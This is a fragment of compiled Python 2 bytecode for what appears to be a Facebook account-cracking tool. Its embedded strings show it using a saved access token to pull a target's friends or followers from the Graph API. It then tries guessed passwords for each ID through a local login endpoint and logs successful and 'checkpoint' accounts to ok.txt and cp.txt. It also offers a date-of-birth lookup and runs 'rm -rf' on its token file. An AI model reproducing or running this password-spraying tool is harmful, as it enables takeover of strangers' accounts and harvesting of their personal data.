\x00\x00\x00R$\x00\x00\x00R\x13\x00\x00\x00Ro\x00\x00\x00R!\x00\x00\x00RR\x00\x00\x00t\x03\x00\x00\x00dobR\x0f\x00\x00\x00Rf\x00\x00\x00Rg\x00\x00\x00R\x00\x00\x00\x00Rh\x00\x00\x00Rd\x00\x00\x00(\x0c\x00\x00\x00Ri\x00\x00\x00R4\x00\x00\x00Rj\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00Rk\x00\x00\x00Rl\x00\x00\x00R7\x00\x00\x00Rm\x00\x00\x00R+\x00\x00\x00Ra\x00\x00\x00Rn\x00\x00\x00(\x00\x00\x00\x00(\x01\x00\x00\x00Rt\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>Ro\x00\x00\x00\xd6\x01\x00\x00s\x98\x00\x00\x00\x00\x01\x0c\x01\x06\x01\x06\x01\x0c\x01\r\x01\x07\x01\x05\x01\x05\x01\x05\x01\x0c\x01\x03\x01!\x01\x12\x01\x11\x01\r\x01\x05\x01\t\x01\x05\x01\n\x01\x0b\x01!\x01\x12\x01\x11\x01\n\x01\n\x01\x13\x01\x1c\x01\x0c\x01\r\x01\x07\x01\x05\x01\x05\x01\x05\x01\x0c\x01\x03\x01!\x01\x12\x01\x11\x01\r\x01\x05\x01\n\x01\x0b\x02%\x01\x12\x01\x11\x01\n\x01\n\x01\x13\x01\x1c\x01\x0c\x01\n\x01\x0c\x01\n\x02\x05\x01\x05\x01\x05\x01\x07\x01\x15\x01\x05\x01\x05\x01\x05\x01\t\x01\x05\x02\x0f\x10\x0c\x01\x10\x01\x05\x01\t\x01\x05\x01\x05\x01\x15\x01\x05\x01\t\x01\x05\x01\n\x01c\x00\x00\x00\x00\x04\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s\xb9\x01\x00\x00y\x19\x00t\x00\x00d
\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00a\x02\x00Wn+\x00\x04t\x03\x00t\x04\x00f\x02\x00k\n\x00rF\x00\x01\x01\x01t\x05\x00j\x06\x00d\x03\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xt\x08\x00j\t\x00d\x04\x00\x83\x01\x00\x01t\n\x00\x83\x00\x00\x01d\x05\x00GHd\x06\x00t\x0b\x00\x17d\x07\x00\x17t\x0c\x00\x17GHd\x05\x00GHt\r\x00d\x08\x00\x83\x01\x00}\x00\x00t\x08\x00j\t\x00d\x04\x00\x83\x01\x00\x01t\n\x00\x83\x00\x00\x01d\x05\x00GHt\x08\x00j\t\x00d\t\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x03\x00\x83\x01\x00\x01yA\x00t\x0e\x00j\x0f\x00d\n\x00|\x00\x00\x17d\x0b\x00\x17t\x02\x00\x17d\x0c\x00t\x10\x00\x83\x01\x01j\x11\x00}\x01\x00t\x12\x00j\x13\x00|\x01\x00\x83\x01\x00}\x02\x00|\x02\x00d\r\x00\x19}\x03\x00Wna\x00\x04t\x03\x00t\x04\x00f\x02\x00k\n\x00rY\x01\x01\x01\x01t\x08\x00j\t\x00d\x04\x00\x83\x01\x00\x01t\n\x00\x83\x00\x00\x01d\x05\x00GHd\x06\x00t\x0b\x00\x17d\x07\x00\x17t\x0c\x00\x17GHd\x05\x00GHd\x0e\x00GHd\x05\x00GHt\r\x00d\x0f\x00\x83\x01\x00\x01t\x14\x00\x83\x00\x00\x01n\x01\x00Xt\x08\x00j\t\x00d\x04\x00\x83\x01\x00\x01t\n\x00\x83\x00\x00\x01d\x05\x00GHd\x06\x00t\x0b\x00\x17d\x07\x00\x17t\x0c\x00\x17GHd\x05\x00GHd\x10\x00|\x00\x00\x17GHd\x11\x00|\x03\x00\x17GHd\x05\x00GHd\x12\x00d\x13\x00\x14GHd\x05\x00GHt\x15\x00\x83\x00\x00\x01d\x00\x00S(\x14\x00\x00\x00Ns\r\x00\x00\x00.fb_token.txtR)\x00\x00\x00i\x01\x00\x00\x00R\x01\x00\x00\x00R\t\x00\x00\x00s\x05\x00\x00\x00\t s\x0e\x00\x00\x00Find DOB Of IDs\x0f\x00\x00\x00 Put id/user : s$\x00\x00\x00echo -e "\t Finding DOB " | lolcats\x1b\x00\x00\x00https://graph.facebook.com/s\x0e\x00\x00\x00?access_token=R.\x00\x00\x00Rp\x00\x00\x00s\x14\x00\x00\x00\x1b[1;93mDOB not founds\x1a\x00\x00\x00 Press enter to try again s\x14\x00\x00\x00\x1b[1;93mAccount ID : s\r\x00\x00\x00\x1b[1;93mDOB : 
i/\x00\x00\x00RE\x00\x00\x00(\x16\x00\x00\x00R\x19\x00\x00\x00R;\x00\x00\x00R\'\x00\x00\x00R$\x00\x00\x00R%\x00\x00\x00R"\x00\x00\x00R#\x00\x00\x00R\x15\x00\x00\x00R\x06\x00\x00\x00R\x07\x00\x00\x00R\x08\x00\x00\x00R\x12\x00\x00\x00R\x13\x00\x00\x00R\x0e\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R \x00\x00\x00R\x1e\x00\x00\x00R\x1f\x00\x00\x00Rd\x00\x00\x00t\x04\x00\x00\x00conf(\x04\x00\x00\x00Rj\x00\x00\x00R)\x00\x00\x00Rk\x00\x00\x00t\x04\x00\x00\x00dobs(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>Ru\x00\x00\x005\x02\x00\x00sR\x00\x00\x00\x00\x02\x03\x01\x19\x01\x13\x01\r\x01\x0b\x01\r\x01\x07\x01\x05\x01\x11\x01\x05\x01\x0c\x01\r\x01\x07\x01\x05\x01\r\x01\r\x01\x03\x01$\x01\x0f\x01\x0e\x01\x13\x01\r\x01\x07\x01\x05\x01\x11\x01\x05\x01\x05\x01\x05\x01\n\x01\x0b\x01\r\x01\x07\x01\x05\x01\x11\x01\x05\x01\t\x01\t\x01\x05\x01\t\x01\x05\x01c\x00\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00sC\x00\x00\x00t\x00\x00d\x01\x00\x83\x01\x00}\x00\x00|\x00\x00d\x02\x00k\x02\x00r"\x00t\x01\x00\x83\x00\x00\x01n\x1d\x00|\x00\x00d\x03\x00k\x02\x00r8\x00t\x02\x00\x83\x00\x00\x01n\x07\x00t\x03\x00\x83\x00\x00\x01d\x00\x00S(\x04\x00\x00\x00Ns\'\x00\x00\x00\x1b[1;93mDo you want to find again (y/n) 
Rr\x00\x00\x00t\x01\x00\x00\x00n(\x04\x00\x00\x00R\x0e\x00\x00\x00Ru\x00\x00\x00Rd\x00\x00\x00R\x0f\x00\x00\x00(\x01\x00\x00\x00t\x02\x00\x00\x00ol(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>Rv\x00\x00\x00`\x02\x00\x00s\x0c\x00\x00\x00\x00\x01\x0c\x01\x0c\x01\n\x01\x0c\x01\n\x02c\x00\x00\x00\x00\x05\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s\xad\x01\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x02\x00\x83\x00\x00\x01y\x19\x00t\x03\x00d\x02\x00d\x03\x00\x83\x02\x00j\x04\x00\x83\x00\x00a\x05\x00Wn\x1e\x00\x04t\x06\x00t\x07\x00f\x02\x00k\n\x00rM\x00\x01\x01\x01t\x08\x00\x83\x00\x00\x01n\x01\x00XyL\x00t\t\x00j\n\x00d\x04\x00t\x05\x00\x17\x83\x01\x00}\x00\x00t\x0b\x00j\x0c\x00|\x00\x00j\r\x00\x83\x01\x00}\x01\x00|\x01\x00d\x05\x00\x19}\x02\x00|\x02\x00j\x0e\x00d\x06\x00\x83\x01\x00d\x07\x00\x19}\x03\x00|\x03\x00}\x04\x00Wn\x9d\x00\x04t\x06\x00t\x07\x00f\x02\x00k\n\x00r\xef\x00\x01\x01\x01d\x08\x00GHd\t\x00t\x0f\x00\x17d\n\x00\x17t\x10\x00\x17GHd\x08\x00GHt\x00\x00j\x01\x00d\x0b\x00\x83\x01\x00\x01t\x11\x00j\x12\x00d\x0c\x00\x83\x01\x00\x01t\x08\x00\x83\x00\x00\x01nK\x00\x04t\t\x00j\x13\x00j\x14\x00k\n\x00r9\x01\x01\x01\x01t\x02\x00\x83\x00\x00\x01d\x08\x00GHd\r\x00GHd\x08\x00GHt\x11\x00j\x12\x00d\x0c\x00\x83\x01\x00\x01t\x15\x00d\x0e\x00\x83\x01\x00\x01t\x16\x00\x83\x00\x00\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x02\x00\x83\x00\x00\x01d\x08\x00GHd\x0f\x00d\x10\x00\x14GHd\x08\x00GHd\x11\x00t\x0f\x00\x17d\x12\x00\x17|\x04\x00\x17t\x10\x00\x17GHd\x08\x00GHd\x0f\x00d\x10\x00\x14GHd\x08\x00GHd\x13\x00GHd\x14\x00GHd\x15\x00GHd\x16\x00GHd\x08\x00GHt\x17\x00\x83\x00\x00\x01d\x00\x00S(\x17\x00\x00\x00NR\x01\x00\x00\x00s\r\x00\x00\x00.fb_token.txtR)\x00\x00\x00s+\x00\x00\x00https://graph.facebook.com/me?access_token=R\x17\x00\x00\x00R\x18\x00\x00\x00i\x00\x00\x00\x00R\t\x00\x00\x00s\x05\x00\x00\x00\t s\x11\x00\x00\x00ID has checkpoints\x14\x00\x00\x00rm -rf .fb_token.txti\x01\x00\x00\x00s.\x00\x00\x00\t \x1b[1;31mTurn on mobile data 
OR wifi\x1b[0;97ms \x00\x00\x00\x1b[1;93mPress enter to try again i/\x00\x00\x00RE\x00\x00\x00s\x03\x00\x00\x00\t s\x0e\x00\x00\x00Logged In Users\x1f\x00\x00\x00\x1b[1;93m[1] Crack from public ids\x1f\x00\x00\x00\x1b[1;93m[2] Crack from followerss\x1d\x00\x00\x00\x1b[1;93m[3] Return method menus\x11\x00\x00\x00\x1b[1;93m[4] Logout(\x18\x00\x00\x00R\x06\x00\x00\x00R\x07\x00\x00\x00R\x08\x00\x00\x00R\x19\x00\x00\x00R;\x00\x00\x00R\'\x00\x00\x00R$\x00\x00\x00R%\x00\x00\x00R\x15\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R\x1e\x00\x00\x00R\x1f\x00\x00\x00R \x00\x00\x00R!\x00\x00\x00R\x12\x00\x00\x00R\x13\x00\x00\x00R"\x00\x00\x00R#\x00\x00\x00R<\x00\x00\x00R\x02\x00\x00\x00R\x0e\x00\x00\x00R\x0f\x00\x00\x00t\r\x00\x00\x00l_menu_select(\x05\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R+\x00\x00\x00R>\x00\x00\x00R?\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>R\x10\x00\x00\x00h\x02\x00\x00sT\x00\x00\x00\x00\x02\r\x01\x07\x01\x03\x01\x19\x01\x13\x01\x0b\x01\x03\x01\x13\x01\x12\x01\n\x01\x13\x01\n\x01\x13\x01\x05\x01\x11\x01\x05\x01\r\x01\r\x01\n\x01\x13\x01\x07\x01\x05\x01\x05\x01\x05\x01\r\x01\n\x01\x0b\x01\r\x01\x07\x01\x05\x01\t\x01\x05\x01\x15\x01\x05\x01\t\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01c\x00\x00\x00\x00\x0c\x00\x00\x00\x06\x00\x00\x00\x03\x00\x00\x00sq\x04\x00\x00t\x00\x00d\x01\x00\x83\x01\x00}\x00\x00g\x00\x00}\x01\x00g\x00\x00\x89\x01\x00g\x00\x00\x89\x00\x00|\x00\x00d\x02\x00k\x02\x00r\xb0\x01t\x01\x00j\x02\x00d\x03\x00\x83\x01\x00\x01t\x03\x00\x83\x00\x00\x01d\x04\x00GHt\x01\x00j\x02\x00d\x05\x00\x83\x01\x00\x01d\x04\x00GHt\x00\x00d\x06\x00\x83\x01\x00}\x02\x00t\x01\x00j\x02\x00d\x03\x00\x83\x01\x00\x01t\x03\x00\x83\x00\x00\x01d\x04\x00GHt\x01\x00j\x02\x00d\x07\x00\x83\x01\x00\x01d\x04\x00GHyi\x00t\x04\x00j\x05\x00d\x08\x00|\x02\x00\x17d\t\x00\x17t\x06\x00\x17\x83\x01\x00}\x03\x00t\x07\x00j\x08\x00|\x03\x00j\t\x00\x83\x01\x00}\x04\x00t\x01\x00j\x02\x00d\x03\x00\x83\x01\x00\x01t\x03\x00\x83\x00\x00\x01d\x04\x00GHt
\x01\x00j\x02\x00d\x05\x00\x83\x01\x00\x01d\x04\x00GHd\n\x00|\x04\x00d\x0b\x00\x19\x17GHWn7\x00\x04t\n\x00t\x0b\x00f\x02\x00k\n\x00r.\x01\x01\x01\x01d\x04\x00GHd\x0c\x00GHd\x04\x00GHt\x00\x00d\r\x00\x83\x01\x00\x01t\x0c\x00\x83\x00\x00\x01n\x01\x00Xt\x04\x00j\x05\x00d\x08\x00|\x02\x00\x17d\x0e\x00\x17t\x06\x00\x17\x83\x01\x00}\x03\x00t\x07\x00j\x08\x00|\x03\x00j\t\x00\x83\x01\x00}\x05\x00xA\x02|\x05\x00d\x0f\x00\x19D]B\x00}\x06\x00|\x06\x00d\x10\x00\x19}\x07\x00|\x06\x00d\x0b\x00\x19}\x08\x00|\x08\x00j\r\x00d\x11\x00\x83\x01\x00d\x12\x00\x19}\t\x00|\x01\x00j\x0e\x00|\x07\x00d\x13\x00\x17|\t\x00\x17\x83\x01\x00\x01qg\x01Wn\xf0\x01|\x00\x00d\x14\x00k\x02\x00rR\x03t\x01\x00j\x02\x00d\x03\x00\x83\x01\x00\x01t\x03\x00\x83\x00\x00\x01d\x04\x00GHt\x01\x00j\x02\x00d\x05\x00\x83\x01\x00\x01d\x04\x00GHt\x00\x00d\x15\x00\x83\x01\x00}\x02\x00t\x01\x00j\x02\x00d\x03\x00\x83\x01\x00\x01t\x03\x00\x83\x00\x00\x01d\x04\x00GHt\x01\x00j\x02\x00d\x07\x00\x83\x01\x00\x01d\x04\x00GHyo\x00t\x04\x00j\x05\x00d\x08\x00|\x02\x00\x17d\t\x00\x17t\x06\x00\x17d\x16\x00t\x0f\x00\x83\x01\x01}\x03\x00t\x07\x00j\x08\x00|\x03\x00j\t\x00\x83\x01\x00}\x04\x00t\x01\x00j\x02\x00d\x03\x00\x83\x01\x00\x01t\x03\x00\x83\x00\x00\x01d\x04\x00GHt\x01\x00j\x02\x00d\x17\x00\x83\x01\x00\x01d\x04\x00GHd\n\x00|\x04\x00d\x0b\x00\x19\x17GHWn7\x00\x04t\n\x00t\x0b\x00f\x02\x00k\n\x00r\xc6\x02\x01\x01\x01d\x04\x00GHd\x0c\x00GHd\x04\x00GHt\x00\x00d\x18\x00\x83\x01\x00\x01t\x0c\x00\x83\x00\x00\x01n\x01\x00Xt\x04\x00j\x05\x00d\x08\x00|\x02\x00\x17d\x19\x00\x17t\x06\x00\x17d\x1a\x00\x17d\x16\x00t\x0f\x00\x83\x01\x01}\x03\x00t\x07\x00j\x08\x00|\x03\x00j\t\x00\x83\x01\x00}\x05\x00x\x9f\x00|\x05\x00d\x0f\x00\x19D]B\x00}\x06\x00|\x06\x00d\x10\x00\x19}\x07\x00|\x06\x00d\x0b\x00\x19}\x08\x00|\x08\x00j\r\x00d\x11\x00\x83\x01\x00d\x12\x00\x19}\t\x00|\x01\x00j\x0e\x00|\x07\x00d\x13\x00\x17|\t\x00\x17\x83\x01\x00\x01q\t\x03WnN\x00|\x00\x00d\x1b\x00k\x02\x00rh\x03t\x10\x00\x83\x00\x00\x01n8\x00|\x00\x00d\x1c\x00k\x02\x00r~\x03t\x11\x00\
x83\x00\x00\x01n"\x00d\x04\x00GHd\x1d\x00t\x12\x00\x17d\x1e\x00\x17t\x13\x00\x17GHd\x04\x00GHt\x14\x00\x83\x00\x00\x01d\x1f\x00t\x15\x00t\x16\x00|\x01\x00\x83\x01\x00\x83\x01\x00\x17GHt\x17\x00j\x18\x00d \x00\x83\x01\x00\x01d!\x00GHd\x04\x00GHd"\x00d#\x00\x14GHd\x04\x00GH\x87\x00\x00\x87\x01\x00f\x02\x00d$\x00\x86\x00\x00}\n\x00t\x19\x00d%\x00\x83\x01\x00}\x0b\x00|\x0b\x00j\x1a\x00|\n\x00|\x01\x00\x83\x02\x00\x01d\x04\x00GHd"\x00d#\x00\x14GHd\x04\x00GHd&\x00GHd\'\x00t\x15\x00t\x16\x00\x88\x01\x00\x83\x01\x00\x83\x01\x00\x17d(\x00\x17t\x15\x00t\x16\x00\x88\x00\x00\x83\x01\x00\x83\x01\x00\x17GHd\x04\x00GHd"\x00d#\x00\x14GHd\x04\x00GHt\x00\x00d)\x00\x83\x01\x00\x01t\x0c\x00\x83\x00\x00\x01d\x00\x00S(*\x00\x00\x00Ns\x13\x00\x00\x00\nChoose Option >>> R\x0c\x00\x00\x00R\x01\x00\x00\x00R\t\x00\x00\x00s(\x00\x00\x00echo -e "\t CRACK Public ID " | lolcats\x10\x00\x00\x00 Put Id/user : s.\x00\x00\x00echo -e "\t Gathering Information " | lolcats\x1b\x00\x00\x00https://graph.facebook.com/s\x0e\x00\x00\x00?access_token=s\x0e\x00\x00\x00Target user : R\x17\x00\x00\x00s0\x00\x00\x00\n\t \x1b[1;31m Logged in id has checkpoint\x1b[0;97ms\x15\x00\x00\x00\nPress enter to back s\x16\x00\x00\x00/friends?access_token=R9\x00\x00\x00R4\x00\x00\x00R\x18\x00\x00\x00i\x00\x00\x00\x00R@\x00\x00\x00R\r\x00\x00\x00s\x0f\x00\x00\x00 Put Id/user : R.\x00\x00\x00s*\x00\x00\x00echo -e "\t Followers Cloning " | lolcats\x16\x00\x00\x00\n Press enter to back s\x1a\x00\x00\x00/subscribers?access_token=s\x0b\x00\x00\x00&limit=5000RA\x00\x00\x00RB\x00\x00\x00s\x05\x00\x00\x00\t s\x13\x00\x00\x00Select valid methods\r\x00\x00\x00Total IDs : g\x00\x00\x00\x00\x00\x00\xe0?s9\x00\x00\x00\x1b[1;93mSILAHKAN DITUNGGU process is running in 
backgroundi/\x00\x00\x00RE\x00\x00\x00c\x01\x00\x00\x00\x0f\x00\x00\x00\x04\x00\x00\x00\x13\x00\x00\x00sh\x07\x00\x00|\x00\x00}\x01\x00|\x01\x00j\x00\x00d\x01\x00\x83\x01\x00\\\x02\x00}\x02\x00}\x03\x00y?\x07|\x03\x00d\x02\x00\x17}\x04\x00t\x01\x00j\x02\x00d\x03\x00|\x02\x00\x17d\x04\x00\x17|\x04\x00\x17d\x05\x00t\x03\x00\x83\x01\x01j\x04\x00}\x05\x00t\x05\x00j\x06\x00|\x05\x00\x83\x01\x00}\x06\x00d\x06\x00|\x06\x00k\x06\x00r\xc2\x00d\x07\x00|\x02\x00\x17d\x08\x00\x17|\x04\x00\x17d\t\x00\x17GHt\x07\x00d\n\x00d\x0b\x00\x83\x02\x00}\x07\x00|\x07\x00j\x08\x00|\x02\x00d\x08\x00\x17|\x04\x00\x17d\x0c\x00\x17\x83\x01\x00\x01|\x07\x00j\t\x00\x83\x00\x00\x01\x88\x01\x00j\n\x00|\x02\x00|\x04\x00\x17\x83\x01\x00\x01n\x97\x06d\r\x00|\x06\x00d\x0e\x00\x19k\x06\x00r)\x01d\x0f\x00|\x02\x00\x17d\x08\x00\x17|\x04\x00\x17GHt\x07\x00d\x10\x00d\x0b\x00\x83\x02\x00}\x08\x00|\x08\x00j\x08\x00|\x02\x00d\x08\x00\x17|\x04\x00\x17d\x0c\x00\x17\x83\x01\x00\x01|\x08\x00j\t\x00\x83\x00\x00\x01\x88\x00\x00j\n\x00|\x02\x00|\x04\x00\x17\x83\x01\x00\x01n0\x06|\x03\x00d\x11\x00\x17}\t\x00t\x01\x00j\x02\x00d\x03\x00|\x02\x00\x17d\x04\x00\x17|\t\x00\x17d\x05\x00t\x03\x00\x83\x01\x01j\x04\x00}\x05\x00t\x05\x00j\x06\x00|\x05\x00\x83\x01\x00}\x06\x00d\x06\x00|\x06\x00k\x06\x00r\xcd\x01d\x07\x00|\x02\x00\x17d\x08\x00\x17|\t\x00\x17d\t\x00\x17GHt\x07\x00d\n\x00d\x0b\x00\x83\x02\x00}\x07\x00|\x07\x00j\x08\x00|\x02\x00d\x08\x00\x17|\t\x00\x17d\x0c\x00\x17\x83\x01\x00\x01|\x07\x00j\t\x00\x83\x00\x00\x01\x88\x01\x00j\n\x00|\x02\x00|\t\x00\x17\x83\x01\x00\x01n\x8c\x05d\r\x00|\x06\x00d\x0e\x00\x19k\x06\x00r4\x02d\x0f\x00|\x02\x00\x17d\x08\x00\x17|\t\x00\x17GHt\x07\x00d\x10\x00d\x0b\x00\x83\x02\x00}\x08\x00|\x08\x00j\x08\x00|\x02\x00d\x08\x00\x17|\t\x00\x17d\x0c\x00\x17\x83\x01\x00\x01|\x08\x00j\t\x00\x83\x00\x00\x01\x88\x00\x00j\n\x00|\x02\x00|\t\x00\x17\x83\x01\x00\x01n%\x05|\x03\x00d\x12\x00\x17}\n\x00t\x01\x00j\x02\x00d\x03\x00|\x02\x00\x17d\x04\x00\x17|\n\x00\x17d\x05\x00t\x03\x00\x83\x01\x01j\x04\x00}\x05\
x00t\x05\x00j\x06\x00|\x05\x00\x83\x01\x00}\x06\x00d\x06\x00|\x06\x00k\x06\x00r\xd8\x02d\x07\x00|\x02\x00\x17d\x08\x00\x17|\n\x00\x17d\t\x00\x17GHt\x07\x00d\n\x00d\x0b\x00\x83\x02\x00}\x07\x00|\x07\x00j\x08\x00|\x02\x00d\x08\x00\x17|\n\x00\x17d\x0c\x00\x17\x83\x01\x00\x01|\x07\x00j\t\x00\x83\x00\x00\x01\x88\x01\x00j\n\x00|\x02\x00|\n\x00\x17\x83\x01\x00\x01n\x81\x04d\r\x00|\x06\x00d\x0e\x00\x19k\x06\x00r?\x03d\x0f\x00|\x02\x00\x17d\x08\x00\x17|\n\x00\x17GHt\x07\x00d\x10\x00d\x0b\x00\x83\x02\x00}\x08\x00|\x08\x00j\x08\x00|\x02\x00d\x08\x00\x17|\n\x00\x17d\x0c\x00\x17\x83\x01\x00\x01|\x08\x00j\t\x00\x83\x00\x00\x01\x88\x00\x00j\n\x00|\x02\x00|\n\x00\x17\x83\x01\x00\x01n\x1a\x04|\x03\x00d\x13\x00\x17}\x0b\x00t\x01\x00j\x02\x00d\x03\x00|\x02\x00\x17d\x04\x00\x17|\x0b\x00\x17d\x05\x00t\x03\x00\x83\x01\x01j\x04\x00}\x05\x00t\x05\x00j\x06\x00|\x05\x00\x83\x01\x00}\x06\x00d\x06\x00|\x06\x00k\x06\x00r\xe3\x03d\x07\x00|\x02\x00\x17d\x08\x00\x17|\x0b\x00\x17d\t\x00\x17GHt\x07\x00d\n\x00d\x0b\x00\x83\x02\x00}\x07\x00|\x07\x00j\x08\x00|\x02\x00d\x08\x00\x17|\x0b\x00\x17d\x0c\x00\x17\x83\x01\x00\x01|\x07\x00j\t\x00\x83\x00\x00\x01\x88\x01\x00j\n\x00|\x02\x00|\x0b\x00\x17\x83\x01\x00\x01nv\x03d\r\x00|\x06\x00d\x0e\x00\x19k\x06\x00rJ\x04d\x0f\x00|\x02\x00\x17d\x08\x00\x17|\x0b\x00\x17GHt\x07\x00d\x10\x00d\x0b\x00\x83\x02\x00}\x08\x00|\x08\x00j\x08\x00|\x02\x00d\x08\x00\x17|\x0b\x00\x17d\x0c\x00\x17\x83\x01\x00\x01|\x08\x00j\t\x00\x83\x00\x00\x01\x88\x00\x00j\x0b\x00|\x02\x00|\x0b\x00\x17\x83\x01\x00\x01n\x0f\x03d\x14\x00}\x0c\x00t\x01\x00j\x02\x00d\x03\x00|\x02\x00\x17d\x04\x00\x17|\x0c\x00\x17d\x05\x00t\x03\x00\x83\x01\x01j\x04\x00}\x05\x00t\x05\x00j\x06\x00|\x05\x00\x83\x01\x00}\x06\x00d\x06\x00|\x06\x00k\x06\x00r\xea\x04d\x07\x00|\x02\x00\x17d\x08\x00\x17|\x0c\x00\x17d\t\x00\x17GHt\x07\x00d\n\x00d\x0b\x00\x83\x02\x00}\x07\x00|\x07\x00j\x08\x00|\x02\x00d\x08\x00\x17|\x0c\x00\x17d\x0c\x00\x17\x83\x01\x00\x01|\x07\x00j\t\x00\x83\x00\x00\x01\x88\x01\x00j\n\x00|\x02\x00|\x0c\x00\x17\
x83\x01\x00\x01no\x02d\r\x00|\x06\x00d\x0e\x00\x19k\x06\x00rQ\x05d\x0f\x00|\x02\x00\x17d\x08\x00\x17|\x0c\x00\x17GHt\x07\x00d\x10\x00d\x0b\x00\x83\x02\x00}\x08\x00|\x08\x00j\x08\x00|\x02\x00d\x08\x00\x17|\x0c\x00\x17d\x0c\x00\x17\x83\x01\x00\x01|\x08\x00j\t\x00\x83\x00\x00\x01\x88\x00\x00j\n\x00|\x02\x00|\x0c\x00\x17\x83\x01\x00\x01n\x08\x02d\x15\x00}\r\x00t\x01\x00j\x02\x00d\x03\x00|\x02\x00\x17d\x04\x00\x17|\r\x00\x17\x83\x01\x00j\x04\x00}\x05\x00t\x05\x00j\x06\x00|\x05\x00\x83\x01\x00}\x06\x00d\x06\x00|\x06\x00k\x06\x00r\xeb\x05d\x07\x00|\x02\x00\x17d\x08\x00\x17|\r\x00\x17d\t\x00\x17GHt\x07\x00d\n\x00d\x0b\x00\x83\x02\x00}\x07\x00|\x07\x00j\x08\x00|\x02\x00d\x08\x00\x17|\r\x00\x17d\x0c\x00\x17\x83\x01\x00\x01|\x07\x00j\t\x00\x83\x00\x00\x01\x88\x01\x00j\n\x00|\x02\x00|\r\x00\x17\x83\x01\x00\x01nn\x01d\r\x00|\x06\x00d\x0e\x00\x19k\x06\x00rR\x06d\x0f\x00|\x02\x00\x17d\x08\x00\x17|\r\x00\x17GHt\x07\x00d\x10\x00d\x0b\x00\x83\x02\x00}\x08\x00|\x08\x00j\x08\x00|\x02\x00d\x08\x00\x17|\r\x00\x17d\x0c\x00\x17\x83\x01\x00\x01|\x08\x00j\t\x00\x83\x00\x00\x01\x88\x00\x00j\n\x00|\x02\x00|\r\x00\x17\x83\x01\x00\x01n\x07\x01d\x16\x00}\x0e\x00t\x01\x00j\x02\x00d\x03\x00|\x02\x00\x17d\x04\x00\x17|\x0e\x00\x17d\x05\x00t\x03\x00\x83\x01\x01j\x04\x00}\x05\x00t\x05\x00j\x06\x00|\x05\x00\x83\x01\x00}\x06\x00d\x06\x00|\x06\x00k\x06\x00r\xf2\x06d\x07\x00|\x02\x00\x17d\x08\x00\x17|\x0e\x00\x17d\t\x00\x17GHt\x07\x00d\n\x00d\x0b\x00\x83\x02\x00}\x07\x00|\x07\x00j\x08\x00|\x02\x00d\x08\x00\x17|\x0e\x00\x17d\x0c\x00\x17\x83\x01\x00\x01|\x07\x00j\t\x00\x83\x00\x00\x01\x88\x01\x00j\n\x00|\x02\x00|\x0e\x00\x17\x83\x01\x00\x01ng\x00d\r\x00|\x06\x00d\x0e\x00\x19k\x06\x00rY\x07d\x0f\x00|\x02\x00\x17d\x08\x00\x17|\x0e\x00\x17GHt\x07\x00d\x10\x00d\x0b\x00\x83\x02\x00}\x08\x00|\x08\x00j\x08\x00|\x02\x00d\x08\x00\x17|\x0e\x00\x17d\x0c\x00\x17\x83\x01\x00\x01|\x08\x00j\t\x00\x83\x00\x00\x01\x88\x00\x00j\n\x00|\x02\x00|\x0e\x00\x17\x83\x01\x00\x01n\x00\x00Wn\x07\x00\x01\x01\x01n\x01\x00Xd\x00\x00S(\x17
\x00\x00\x00NR@\x00\x00\x00RF\x00\x00\x00s\x1e\x00\x00\x00http://localhost:5000/auth?id=s\x06\x00\x00\x00&pass=R.\x00\x00\x00R/\x00\x00\x00s\x1b\x00\x00\x00\x1b[1;32m[Successful] \x1b[1;30ms\x03\x00\x00\x00 | s\x07\x00\x00\x00\x1b[0;97ms\x06\x00\x00\x00ok.txtRH\x00\x00\x00s\x01\x00\x00\x00\ns\x10\x00\x00\x00www.facebook.comR0\x00\x00\x00s\x14\x00\x00\x00\x1b[1;93m[Checkpoint] s\x06\x00\x00\x00cp.txtRJ\x00\x00\x00RK\x00\x00\x00RL\x00\x00\x00RN\x00\x00\x00RM\x00\x00\x00RO\x00\x00\x00(\x0c\x00\x00\x00RP\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R \x00\x00\x00R\x1e\x00\x00\x00R\x1f\x00\x00\x00R\x19\x00\x00\x00R\x1a\x00\x00\x00R\x1b\x00\x00\x00RR\x00\x00\x00t\x07\x00\x00\x00apppend(\x0f\x00\x00\x00RS\x00\x00\x00RT\x00\x00\x00R7\x00\x00\x00R\x17\x00\x00\x00RU\x00\x00\x00R9\x00\x00\x00R*\x00\x00\x00R?\x00\x00\x00RY\x00\x00\x00RX\x00\x00\x00RZ\x00\x00\x00R[\x00\x00\x00R\\\x00\x00\x00R]\x00\x00\x00R^\x00\x00\x00(\x02\x00\x00\x00R_\x00\x00\x00R`\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>Ra\x00\x00\x00\xec\x02\x00\x00s\xdc\x00\x00\x00\x00\x01\x06\x01\x15\x01\x03\x01\n\x01$\x01\x0f\x01\x0c\x01\x15\x01\x0f\x01\x19\x01\n\x01\x14\x02\x10\x01\x11\x01\x0f\x01\x19\x01\n\x01\x14\x02\n\x01$\x01\x0f\x01\x0c\x01\x15\x01\x0f\x01\x19\x01\n\x01\x14\x02\x10\x01\x11\x01\x0f\x01\x19\x01\n\x01\x14\x02\n\x01$\x01\x0f\x01\x0c\x01\x15\x01\x0f\x01\x19\x01\n\x01\x14\x02\x10\x01\x11\x01\x0f\x01\x19\x01\n\x01\x14\x02\n\x01$